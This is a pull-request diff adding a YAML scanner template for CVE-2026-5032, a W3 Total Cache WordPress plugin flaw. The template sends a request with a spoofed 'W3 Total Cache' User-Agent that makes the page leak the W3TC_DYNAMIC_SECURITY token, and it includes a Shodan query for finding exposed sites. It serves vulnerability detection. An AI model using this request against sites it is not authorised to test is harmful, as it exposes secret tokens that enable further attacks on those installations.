Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions http/cves/2026/CVE-2026-5032.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,56 @@
id: CVE-2026-5032

info:
name: W3 Total Cache <= 2.9.3 - Unauthenticated W3TC_DYNAMIC_SECURITY Token Disclosure
author: VISHVAJITH-REDDY
severity: high
description: |
W3 Total Cache plugin for WordPress <= 2.9.3 is vulnerable to information
disclosure. Sending a request with a User-Agent containing "W3 Total Cache"
bypasses output buffering, exposing the W3TC_DYNAMIC_SECURITY token in the
page source to unauthenticated attackers when fragment caching is enabled.
impact: |
An unauthenticated attacker can retrieve the W3TC_DYNAMIC_SECURITY token,
which may be leveraged for further attacks against the WordPress installation.
remediation: |
Update W3 Total Cache to version 2.9.4 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-5032
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a65eb62d-847b-4f3a-848b-1290e3118c01
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-5032
cwe-id: CWE-200
metadata:
verified: false
max-request: 1
vendor: boldgrid
product: w3-total-cache
shodan-query: 'http.component:"W3 Total Cache"'
tags: cve,cve2026,wordpress,wp-plugin,w3-total-cache,exposure,unauth

http:
- method: GET
path:
- "{{BaseURL}}/"
headers:
User-Agent: "W3 Total Cache"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "W3TC_DYNAMIC_SECURITY"

- type: word
part: body
words:
- "wordpress"
- "wp-content"
condition: or

- type: status
status:
- 200